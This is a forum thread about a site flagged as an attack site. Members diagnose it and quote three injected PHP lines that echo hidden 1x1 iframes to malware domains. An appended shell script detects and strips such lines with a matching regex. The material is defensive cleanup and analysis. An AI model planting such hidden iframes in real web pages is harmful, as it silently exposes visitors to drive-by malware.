Web Client hit with Reported Attack Site!


Status
Not open for further replies.

Mahavikri

Apprentice 1.0
asking again...

Reported Attack Site!

This web site at karawang.info has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
domain: http://karawang.info/

Any idea why? How do I get it back to normal?

I already tried scanning with clamav, and it didn't find any virus:
----------- SCAN SUMMARY -----------
Known viruses: 545705
Engine version: 0.95.1-broken-compiler
Scanned directories: 471
Scanned files: 5958
Infected files: 0
Data scanned: 365.38 MB
Data read: 168.02 MB (ratio 2.17:1)
Time: 211.309 sec (3 m 31 s)
:confused: :confused:
 

ruangweb

(Ret) Community Leader
This is the message that shows up when you click the "Why was this site blocked?" button in Firefox (URL http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://karawang.info/ )
Safe Browsing
Diagnostic page for karawang.info

What is the current listing status for karawang.info?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 695 pages we tested on the site over the past 90 days, 42 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-23, and the last time suspicious content was found on this site was on 2009-04-23.

Malicious software includes 1250 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 1 domain(s), including goooogleadsence.biz/.

This site was hosted on 4 network(s) including AS46475, AS30496 (COLO4), AS25653 (FORTRESSITX).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, karawang.info did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

* Return to the previous page.
* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
 

Bforce

Hosting Guru
The site contains 2 banned domains, in 3 injected iframes (in the footer):
internetcountercheck[dot]com
goooogleadsence[dot]biz

Domain Name: INTERNETCOUNTERCHECK[dot]COM
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM
Name Server: NS2.SUSPENDED-DOMAIN.COM

Domain Name: GOOOOGLEADSENCE[dot]BIZ
Domain ID: D29931447-BIZ
Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM
Name Server: NS2.SUSPENDED-DOMAIN.COM
 

Mahavikri

Apprentice 1.0
Yes, found it in the index.php file, at the bottom, starting with echo" ....
But why does it still show up, boss... :confused:
 

ruangweb

(Ret) Community Leader

am3n

Apprentice 1.0
Thanks Ruangweb for the pointers. Sorry, I'm worn out after manually deleting these 3 lines from many files

Code:
echo "<iframe src=\"http://thedeadpit.com/?click=5187687\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://internetcountercheck.com/?click=5988250\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://goooogleadsence.biz/?click=19CD29\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
btw Mahavikri, try searching for it with this command

Code:
grep -R goooogleadsence * > infected
in the public_html folder, then look at the file infected. Because on this site, those 3 lines are stuck in many files :(

What's strange is how so many files could get those 3 lines of code appended, even though the files are not world-writeable.
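
A scan-and-clean pass for the injection described in this thread, as an added example that is not part of the original posts: it matches the shape of the injected `echo` line (a hidden 1x1 iframe) rather than one domain name, so lines pointing at other domains are found too. The function names, the `.bak` suffix and the sample tree with its `injected.example.invalid` host are assumptions constructed for the example; `--include` needs GNU grep.

```sh
#!/bin/sh
# Added example, not from the thread. Matches the shape of the injected line
# (an echo of a hidden 1x1 iframe), so it also catches domains not yet known.

# ERE for one injected line, modelled on the three lines quoted above.
INJECT_RE='^[[:space:]]*echo[[:space:]]+"<iframe src=\\"http://[^"]*\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";[[:space:]]*$'

# Print the PHP files under directory $1 that contain an injected line.
scan_injected() {
    grep -rlE --include='*.php' -e "$INJECT_RE" "$1" | sort
}

# Strip injected lines from every affected file under $1.
# Each original is kept as <file>.bak; prints the number of files cleaned.
clean_injected() {
    list=$(mktemp) || return 1
    scan_injected "$1" > "$list"
    n=0
    while IFS= read -r f; do
        cp -p "$f" "$f.bak"
        # Rewrite in place (same inode, same permissions); grep -v exits 1
        # when nothing is left, which is not an error here.
        grep -vE -e "$INJECT_RE" "$f.bak" > "$f" || true
        n=$((n + 1))
    done < "$list"
    rm -f "$list"
    echo "$n"
}

# Constructed sample tree: two infected files, one clean file with a
# legitimate visible iframe that must not be touched.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/inc"
    inj='echo "<iframe src=\"http://injected.example.invalid/?click=0000\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";'
    printf '%s\n' '<?php' 'echo "footer";' "$inj" "$inj" > "$d/index.php"
    printf '%s\n' '<?php' "$inj" > "$d/inc/menu.php"
    printf '%s\n' '<?php' 'echo "<iframe src=\"/map.html\" width=600 height=400></iframe>";' > "$d/about.php"
    echo "$d"
}

# Demo run: list infected files, clean them, confirm nothing is left.
demo=$(make_demo_tree)
scan_injected "$demo"
echo "cleaned: $(clean_injected "$demo") file(s)"
echo "remaining: $(scan_injected "$demo" | wc -l)"
rm -rf "$demo"
```

Review the `scan_injected` list before running `clean_injected`; the `.bak` copies are made with `cp -p`, so they keep the modification times of the infected files for comparison against FTP and web-server logs.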
 